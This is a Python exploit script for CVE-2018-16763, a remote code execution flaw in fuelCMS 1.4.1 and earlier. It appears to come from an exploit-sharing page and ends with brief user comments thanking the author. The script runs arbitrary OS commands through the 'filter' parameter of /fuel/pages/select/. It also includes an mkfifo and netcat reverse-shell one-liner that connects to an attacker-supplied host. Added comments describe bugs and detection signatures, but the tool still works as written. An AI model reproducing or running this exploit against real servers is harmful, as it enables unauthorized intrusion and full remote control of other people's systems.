#!/usr/bin/python3 | |
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution | |
# Date: 2019-07-19 | |
# Exploit Author: 0xd0ff9 | |
# Vendor Homepage: https://www.getfuelcms.com/ | |
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 | |
# Version: <= 1.4.1 | |
# Tested on: Ubuntu - Apache2 - php5 | |
# CVE : CVE-2018-16763 | |
# | |
# Poc Created by Ac1d (assassin) | |
import requests | |
import sys | |
import urllib | |
from requests.sessions import extract_cookies_to_jar | |
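class col:
    """ANSI escape sequences used to colour terminal output.

    Attributes are plain strings; callers concatenate them around text and
    terminate with ``RESET``.  The original listing assigned ``GREEN`` and
    ``BLUE`` twice; only the last assignment in a class body takes effect, so
    the shadowed first definitions are dropped and the surviving values kept.
    """
    HEADER = '\033[95m'
    CYAN = '\033[96m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    RESET = '\033[0m'
    BLACK = "\033[0;30m"
    RED = "\033[0;31m"
    GREEN = "\033[0;32m"  # the surviving (second) definition from the original
    BROWN = "\033[0;33m"
    BLUE = "\033[0;34m"  # the surviving (second) definition from the original
    PURPLE = "\033[0;35m"
    LIGHT_GRAY = "\033[0;37m"
    DARK_GRAY = "\033[1;30m"
    LIGHT_RED = "\033[1;31m"
    LIGHT_GREEN = "\033[1;32m"
    YELLOW = "\033[1;33m"
    LIGHT_BLUE = "\033[1;34m"
    LIGHT_PURPLE = "\033[1;35m"
    LIGHT_CYAN = "\033[1;36m"
    LIGHT_WHITE = "\033[1;37m"
    BOLD = "\033[1m"
    FAINT = "\033[2m"
    ITALIC = "\033[3m"
    UNDERLINE = "\033[4m"
    BLINK = "\033[5m"
    NEGATIVE = "\033[7m"
    CROSSED = "\033[9m"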
def banner():
    """Return the tool's ASCII-art banner, wrapped in light-blue ANSI codes."""
    art = r"""
______ _ _____ ___ ___ _____
| ___| | / __ \| \/ |/ ___|
| |_ _ _ ___| | / \/| . . |\ `--.
| _| | | |/ _ \ | | | |\/| | `--. \
| | | |_| | __/ | \__/\| | | |/\__/ /
\_| \__,_|\___|_|\____/\_| |_/\____/
Tested on 1.4
"""
    credit = "Created by Ac1d"
    return f"{col.LIGHT_BLUE}{art}{credit}{col.RESET}"
def help():
    """Return the coloured interactive menu text.

    Note that this function shadows the builtin ``help``; the name is kept
    because the interactive loop calls it by this name.
    """
    parts = (
        col.LIGHT_WHITE,
        "\n\tMenu\n",
        col.LIGHT_GREEN,
        "\nexit -\tExit app",
        "\nshell_me -\tGet a reverse shell (netcat) ",
        "\nhelp -\tShow this help\n",
        col.RESET,
    )
    return "".join(parts)
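print(banner())
print(help())
# Sample of the request this tool issues (page-local example, host 10.10.12.27):
#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27
# The fixed `/fuel/pages/select/?filter=` path together with the
# `pi(print(...))` payload shape is what a WAF rule or an access-log search
# would key on when looking for CVE-2018-16763 attempts.
if len(sys.argv) != 2:
    print("\nUsage: python3 exploit.py Vulnerable IPADDRESS")
    # Usage error: exit non-zero so a calling shell can distinguish it from a
    # normal run (the original exited 0 here).
    sys.exit(1)
# Target host, inserted verbatim (unvalidated) into the request URL built later.
IP = sys.argv[1]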
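def parsePage(page):
    """Cut the response body down to the text preceding the page's own markup.

    Everything from the ``<h4>A PHP Error was encountered</h4>`` heading (if
    present) and from the first ``<div`` onward is discarded, then a fixed
    six-character prefix is dropped from what remains.  NOTE(review): the
    meaning of that six-character prefix is not explained anywhere in the
    listing — confirm what it skips before relying on it.

    Args:
        page: the response body as text.

    Returns:
        The trimmed string, or ``False`` when *page* does not support the
        string operations (e.g. ``None``).
    """
    try:
        before_error = page.split("<h4>A PHP Error was encountered</h4>")[0]
        before_markup = before_error.split("<div")[0]
    except (AttributeError, TypeError):
        # The original swallowed every exception here; only non-string input
        # can actually make these calls fail, so catch just that case.
        return False
    return before_markup[6:]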
# Interactive command loop.  NOTE(review): the try/except wraps the *whole*
# loop, so any exception raised inside it (a malformed "ip:port" answer, a
# network error, a non-string page) ends the session after the message in the
# except block — even though that message says "please try again".  Moving the
# try inside the loop body would make the retry promise true.
try:
    while True:
        cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)
        # Case-insensitive prefix match: any input starting with "exit" quits.
        if cmd[0:4].lower() == "exit":
            print(col.RED + "Exiting..." + col.RESET)
            sys.exit(0)
        if cmd[0:8] == "shell_me":
            # Expects exactly "host:port"; input without exactly one ":" raises
            # ValueError here, which only the outer except handles.
            IP2, PORT = input(col.LIGHT_BLUE + "Enter your attacking machine IP:PORT $ " + col.RESET).split(":")
            # The mkfifo + nc pipeline below is a widely known reverse-shell
            # pattern; its literal text is the kind of command line that
            # host-based command-line monitoring and egress rules flag.
            nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
            cmd = nc
            print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
        if cmd[0:4] == "help":
            print(help())
            continue
        # The "Sending request." notice is suppressed for the reverse-shell
        # payload, recognised by its "/tmp/f;mkfifo" substring.
        if not "/tmp/f;mkfifo" in cmd:
            print(col.LIGHT_GRAY + "Sending request." + col.RESET)
        # NOTE(review): urllib.parse is used here but the file only does
        # `import urllib`; this works only because requests has already
        # imported urllib.parse.  `import urllib.parse` would make it explicit.
        cmd = urllib.parse.quote(cmd)
        # CVE-2018-16763: the `filter` parameter of /fuel/pages/select/ is
        # evaluated as PHP, and the payload binds $a to 'system' and calls it
        # with the command.  The request is plain HTTP and has no timeout, so
        # an unresponsive server blocks this call indefinitely.  The fixed
        # path/parameter and the `pi(print(...))` shape are the signature a
        # WAF rule or access-log search would match on.
        r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
        # Non-200 responses are ignored silently: no message, next prompt.
        if r.status_code == 200:
            page = parsePage(r.text)
            # parsePage returns False for non-string input; that value is not
            # "\n", so it would reach .strip() below, raise AttributeError, and
            # end the loop via the outer except.
            if page == "\n":
                print(col.RED + "No result" + col.RESET)
                continue
            print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)
except Exception as e:
    # Reached for any error raised anywhere in the loop; the script then ends
    # because nothing follows this block.
    print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)
Glad to hear that, cheers !!!
awesome happy hacking
Thank you Sir, it works well for me